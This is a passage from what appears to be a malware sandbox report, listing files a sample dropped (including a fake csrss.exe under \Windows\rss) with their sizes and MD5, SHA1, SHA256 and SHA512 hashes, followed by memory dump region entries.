    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • \Users\Admin\AppData\Local\Temp\dbghelp.dll

    Filesize

    1.5MB

    MD5

    f0616fa8bc54ece07e3107057f74e4db

    SHA1

    b33995c4f9a004b7d806c4bb36040ee844781fca

    SHA256

    6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

    SHA512

    15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

    Filesize

    5.3MB

    MD5

    1afff8d5352aecef2ecd47ffa02d7f7d

    SHA1

    8b115b84efdb3a1b87f750d35822b2609e665bef

    SHA256

    c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

    SHA512

    e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

  • \Users\Admin\AppData\Local\Temp\symsrv.dll

    Filesize

    163KB

    MD5

    5c399d34d8dc01741269ff1f1aca7554

    SHA1

    e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

    SHA256

    e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

    SHA512

    8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

  • \Windows\rss\csrss.exe

    Filesize

    4.5MB

    MD5

    710c5be65f9008624031fd6e83f159a1

    SHA1

    fc96bb430ee852591ec34ce6e93d4a07b37402a0

    SHA256

    797d16436302c18db3594f4a5fd0cd4a1f23116f7bd333b27d2c59f27d4fe5d8

    SHA512

    08a75bd757658ba88f732c73800ffaba1d5753d420a6c93ab1c00c568d78f88992638f571e9cc4d00ccbd72770efc9ff270217bb37b870d4f9c33b34930fa8b5

  • memory/1884-4-0x0000000000400000-0x0000000002FBB000-memory.dmp

    Filesize

    43.7MB

  • memory/1884-5-0x0000000002FC0000-0x00000000033FB000-memory.dmp

    Filesize

    4.2MB

  • memory/1884-7-0x0000000003400000-0x0000000003D1E000-memory.dmp

    Filesize

    9.1MB

  • memory/1884-6-0x0000000000400000-0x0000000000D39000-memory.dmp

    Filesize

    9.2MB

  • memory/1884-2-0x0000000003400000-0x0000000003D1E000-memory.dmp

    Filesize

    9.1MB

  • memory/1884-0-0x0000000002FC0000-0x00000000033FB000-memory.dmp

    Filesize

    4.2MB

  • memory/1884-3-0x0000000000400000-0x0000000000D39000-memory.dmp

    Filesize

    9.2MB

  • memory/1884-1-0x0000000002FC0000-0x00000000033FB000-memory.dmp

    Filesize

    4.2MB

  • memory/2680-50-0x0000000000400000-0x0000000002FBB000-memory.dmp

    Filesize

    43.7MB

  • memory/2680-98-0x0000000000400000-0x0000000002FBB000-memory.dmp

    Filesize

    43.7MB

  • memory/2680-66-0x0000000000400000-0x0000000002FBB000-memory.dmp

    Filesize

    43.7MB

  • memory/2680-111-0x0000000000400000-0x0000000002FBB000-memory.dmp

    Filesize

    43.7MB

  • memory/2680-110-0x0000000000400000-0x0000000002FBB000-memory.dmp

    Filesize

    43.7MB

  • memory/2680-18-0x0000000003300000-0x000000000373B000-memory.dmp

    Filesize

    4.2MB

  • memory/2680-109-0x0000000000400000-0x0000000002FBB000-memory.dmp

    Filesize

    43.7MB

  • memory/2680-95-0x0000000000400000-0x0000000002FBB000-memory.dmp

    Filesize

    43.7MB

  • memory/2680-97-0x0000000000400000-0x0000000002FBB000-memory.dmp

    Filesize

    43.7MB

  • memory/2680-65-0x0000000000400000-0x0000000002FBB000-memory.dmp

    Filesize

    43.7MB

  • memory/2680-108-0x0000000000400000-0x0000000002FBB000-memory.dmp

    Filesize

    43.7MB

  • memory/2680-104-0x0000000000400000-0x0000000002FBB000-memory.dmp

    Filesize

    43.7MB

  • memory/2680-105-0x0000000000400000-0x0000000002FBB000-memory.dmp

    Filesize

    43.7MB

  • memory/2680-106-0x0000000000400000-0x0000000002FBB000-memory.dmp

    Filesize

    43.7MB

  • memory/2680-107-0x0000000000400000-0x0000000002FBB000-memory.dmp

    Filesize

    43.7MB

  • memory/2840-23-0x0000000140000000-0x00000001405E8000-memory.dmp

    Filesize

    5.9MB

  • memory/2840-39-0x0000000140000000-0x00000001405E8000-memory.dmp

    Filesize

    5.9MB

  • memory/2936-8-0x00000000032C0000-0x00000000036FB000-memory.dmp

    Filesize

    4.2MB

  • memory/2936-17-0x0000000000400000-0x0000000002FBB000-memory.dmp

    Filesize

    43.7MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.